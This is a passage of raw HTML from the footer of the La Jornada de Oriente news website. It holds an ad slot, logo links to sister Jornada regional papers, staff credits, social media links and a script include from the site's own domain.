id='div-gpt-ad-1450188623239-0' style='height:90px; width:728px;'></div></div> <br/><br/> <!-- Begin footer --><div class="footer_wrapper"><div id="footer"><div id="ligas_jornadas"> <a href="http://www.jornada.unam.mx/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornada.png" /></a> <a href="http://www.lja.mx/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadaaguascalientes.png" /></a> <a href="http://www.lajornadaguerrero.com.mx/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadaguerrero.png" /></a><a href="http://www.jornadamorelos.com/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadamorelos.png" /></a> <a href="http://www.lajornadasanluis.com.mx/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadasanluis.png" /></a> <a href="http://www.jornadaveracruz.com.mx/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadaveracruz.png" /></a> <a href="http://www.ljz.mx/" target="_blank"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/lajornadazacatecas.png" /></a></div></div><div id="copyright"><div class="standard_wrapper wide"> <span>DIRECTOR FUNDADOR: CARLOS PAYÁN ■ DIRECTORA GENERAL: CARMEN LIRA ■ PUBLICACIÓN PARA PUEBLA Y TLAXCALA</span> <br/><br/><div id="copyright_left"> © Sierra Nevada Comunicaciones S.A. de C.V. 2017 <!--                <br /> Diseño y programaci&oacute;n: Berry Interactive--></div><div class="social_wrapper"><ul><li><a target="_blank" title="La Jornada de Oriente en Facebook" href=" https://www.facebook.com/lajornadadeoriente/  "><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/facebook.png" alt=""/></a></li><li><a target="_blank" title="La Jornada de Oriente en Twitter" href=" https://twitter.com/jornadaoriente  "> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/twitter.png" alt=""/></a></li><li><a target="_blank" title="Google+" href="https://plus.google.com/117083728200096644534/"><img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/social_black/google.png" alt=""/></a></li></ul></div></div></div></div> <!-- End footer --></div> <!-- End template wrapper --><div id="toTop"> <img src="http://www.lajornadadeoriente.com.mx/wp-content/themes/jornadaberry_future/images/arrow_up_24x24.png" alt=""/></div> <script type="text/javascript" defer src="http://www.lajornadadeoriente.com.mx/wp-content/cache/autoptimize/js/autoptimize_3baae318ff8d07036ad00e491f88ce66.js"></script></body></html>